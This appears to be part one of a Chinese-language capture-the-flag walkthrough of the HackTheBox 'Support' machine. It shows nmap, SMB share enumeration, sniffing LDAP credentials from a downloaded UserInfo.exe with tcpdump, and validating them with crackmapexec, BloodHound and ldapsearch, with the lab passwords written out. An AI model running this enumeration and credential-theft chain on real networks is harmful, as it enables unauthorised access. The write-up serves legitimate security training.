HackTheBox::Support(上）

# HackTheBox::Support（上）

**这款靶机对我而言，非常难，不过所幸，耗时非常之久，终于把这款靶机拿下了。**

## 信息收集

```
nmap -sC -sV -oA ./support 10.10.11.174
```

![image-20230216205226750](/media/202302/2023-02-16_2250270.4706173077884136.png)

**其实从扫描结果来看，我就已经不抱希望了，因为我对 Windows 系统如何提权不是很了解，再加上从扫描结果来看，并没有开启 80 这样的 web 端口，唯一能得到可能有戏的就是开启了一个 smb 服务，并且得到一个域名 support.htb。**

**所以，对我来说，只有 smb 这个路线能走，走不通就放弃。**

### 开始 SMB 服务探测

```
smbmap -H 10.10.11.174 -u 'loochsec' -p '' --depth 5
```

![image-20230216210116827](/media/202302/2023-02-16_2250270.5401163478047821.png)

![image-20230216210104899](/media/202302/2023-02-16_2250280.8408729354051723.png)

**大家其实可以看到，我用无账号和无密码探测，探测不出任何东西，但是经过我多次尝试，在我尝试随便加上一个用户，就探测出了一些东西时，我惊呆了，这又让我涨了见识！**

**探测到一些有用的，比如 support-tools，结合域名，这个应该是一些这个域使用的一些工具。**

**话不多说，登录进去，然后下载下来看看是啥。**

```
smbclient //10.10.11.174/support-tools -N
```

![image-20230216210830202](/media/202302/2023-02-16_2250290.056394626103339784.png)

**以上是得到的一些工具，其中 UserInfo.exe 引起了我的注意，因为是翻译过来就是用户信息，也许能得到一些有用的东西。**

**把这个给下载下来，进行分析。因为是 exe 格式，所以需要安装 powershell 和.net 框架。笔者都已经安装好了。这里就不再安装一遍了。后面会在视频中安装的。**

### 分析 UserInfo.exe

**下载下来之后，先解压，再 file 命令来分析。**

```
unzip UserInfo.exe.zip
file UserInfo.exe
```

![image-20230216211610555](/media/202302/2023-02-16_2250300.18399713621093372.png)

**发现还需要安装一个 Mono.Net。所以进行安装**

```
apt search mono | grep completeapt search mono | grep complete
apt install mono-complete
```

![image-20230216211732886](/media/202302/2023-02-16_2250300.27135055197235525.png)

**安装完毕之后，开始运行：**

```
./UserInfo.exe
```

![image-20230216211915476](/media/202302/2023-02-16_2250310.1259974187254459.png)

**.**![image-20230216211955712](/media/202302/2023-02-16_2250310.32468856235899146.png)

**笔者发现，这里链接错误，当有连接出现，我们应该想到要监控网卡，看看有什么流量。**

### Tcpdump 监控流量

```
tcpdump -i eth0 -vv port domain
tcpdump -i tun0 -vv port domain
```

**笔者这里监控了两个网卡**

![image-20230216212319587](/media/202302/2023-02-16_2250320.5925428134901788.png)

**笔者发现请求了 support.htb 这个域名，既然请求了，那当然要分析一下数据包类容了。**

**发现请求了 support.htb 这个域名，把这个域名加入到 hosts 文件中，继续尝试。**

**重启启动 tcpdump：**

```
tcpdump -i tun0 -X -vv
tcpdump -i eth0 -X -vv
```

![image-20230216213313955](/media/202302/2023-02-16_2250320.8621102288160525.png)

**在 tun0 网卡中，发现了这个数据，这个格式，在域环境中很想主机名\用户.密码。复制下来，尝试一下。**

```
crackmapexec smb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb 10.10.11.174 --shares
```

![image-20230216214607812](/media/202302/2023-02-16_2250330.09201592430249561.png)

**枚举成功，说明用户和密码是对的，此时可以尝试用工具对域内信息进行收集了。**

### 域内信息收集

**这里推荐一个 bloodhound 工具，需要自己下载，并且下载 neo4j 数据库，一样，为了节约时间，这里不展示如何下载了。**

```
python3 bloodhound.py -d support.htb -ns 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -c all --dns-tcp
```

![image-20230216220038031](/media/202302/2023-02-16_2250330.5779350726171156.png)

**发现请求了 dc.support.htb 主机,看这个名字，应该就是我们这次的目标，域控管理员主机了。**

**继续配置 hosts 文件。**

**继续探测，当探测结束，文件夹会出现这几个文件：**

![image-20230216222109513](/media/202302/2023-02-16_2250350.07273685296839871.png)

**运行 neo4j 数据库**

```
neo4j console
```

**运行 bloodhound**

```
./BloodHound --no-sandbox
```

**进入界面后，将以上的文件拖入界面中，即可。**

![image-20230216222314861](/media/202302/2023-02-16_2250350.10879495150481366.png)

**不过在我们的查找过程中，没有发现有什么可以直接利用的。**

**所以继续探测。**

```
ldapsearch -H ldap://10.10.11.174 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -D 'ldap@support.htb' -b 'dc=support,dc=htb'
```

![image-20230216223701224](/media/202302/2023-02-16_2250360.6769392751286308.png)

**探测完成之后，会出现很多信息，我们从这些信息中，看到了一个东西，如下：**

![image-20230216224306592](/media/202302/2023-02-16_2250370.13896981504092087.png)

**info 信息，一般在域环境中的共享账号中，表示的是密码，所以，我们尝试一下。**

```
crackmapexec smb 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
```

![image-20230216224607859](/media/202302/2023-02-16_2250390.7210788222205959.png)

**发现身份验证完成。**